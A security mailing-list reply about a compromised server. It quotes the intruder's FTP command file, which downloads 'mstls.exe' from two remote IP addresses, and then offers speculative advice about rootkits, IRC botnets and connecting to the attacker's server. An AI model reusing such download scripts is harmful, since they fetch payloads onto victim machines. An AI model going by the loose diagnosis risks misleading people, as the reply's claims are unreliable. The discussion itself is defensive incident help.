Re: what next

[jhori <jhori () ucdavis edu>]

nemanja.janic () centroproizvod co yu wrote:
> Hello list,
> i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place.
> Here goes:
> i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no 
> extension) which contained the following lines:
>
> open 80.93.223.22 14547 
> user 1 1  
> get mstls.exe  
> quit  
> open 80.71.219.134 5191 
> user 1 1  
> get mstls.exe  
> quit
>
> I figure this is some script to be used with ftp, or at least i think so. 
> I did tracert to those adresses, but that's where i'm stuck. What can i do next? 
> And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. 
> Thanx in advance.
>
>   
To elaborate a little more on this, it's a rootkit with a ftp built into 
it. Meaning that it connects to a IRC server somewhere.

Sounds like your machine might still be a bot within a botnet though. I 
tried connecting to the server mentioned above in mIRC and get a 
connection refused (meaning that they have some kind of script within 
the rootkit that will most likely put in a pwd to allow access)

Although you may have already deleted the file, it has most likely 
installed itself within another folder. I would try and do a search for 
.mrc files within your PC to try and find that folder. You'll most 
likely find all the information that you need to get on that server 
within the folder.

If you don't want to do the research, then I would get some kind of 
rootkit cleaner...There's a lot to choose from.